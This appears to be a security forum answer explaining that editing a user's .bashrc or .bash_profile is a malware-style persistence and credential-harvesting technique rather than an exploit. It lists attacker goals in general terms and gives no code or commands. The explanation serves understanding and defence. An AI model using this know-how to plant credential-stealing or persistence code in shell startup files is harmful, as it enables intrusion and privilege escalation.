This is not an exploit, as there is no underlying vulnerability to be exploited. It's more akin to malware, in the sense that it does something malicious on your system.
As you probably know, .bashrc
and .bash_profile
run after a user runs bash
and authenticates successfully. This is not a vulnerability and very much so by design and/or necessity, however you want to look at it.
On the surface, it seems like a straightforward thing to use for an attacker to escalate their privileges. A file that executes anything as soon as the user does a trivial task. In practice however, this is more difficult. In order to edit the .bashrc
or .bash_profile
file, you need some way to edit arbitrary files with the permissions of the user you would like to attack. This is already an incredibly strong position to be in, and modifying those files will likely not get you into a better position. An analogy for this would be if you are holding a gun, then a toothpick will not be a better weapon.
Therefore, an attacker wants to either escalate their privileges even more, or they want to make their current access more consistent or more convenient. This is something that modifying .bashrc
can help with. The example you already made shows this very well. By gathering the user's credentials, access to the machine could either be easier (connecting directly via SSH rather than using e.g. a web shell or some other exploit) or it could allow the attacker to execute commands rather than only writing files.
Other things an attacker may want to do is:
- Modify system files to include malicious behavior (to persist access)
- Gather administrative credentials to act as root (to escalate privileges)
- Launch other malicious software (to make further exploitation more convenient)
How exactly those are done is not rocket science. .bashrc
executes whatever you put there with the permission of the current user. You can use your imagination to come up with examples.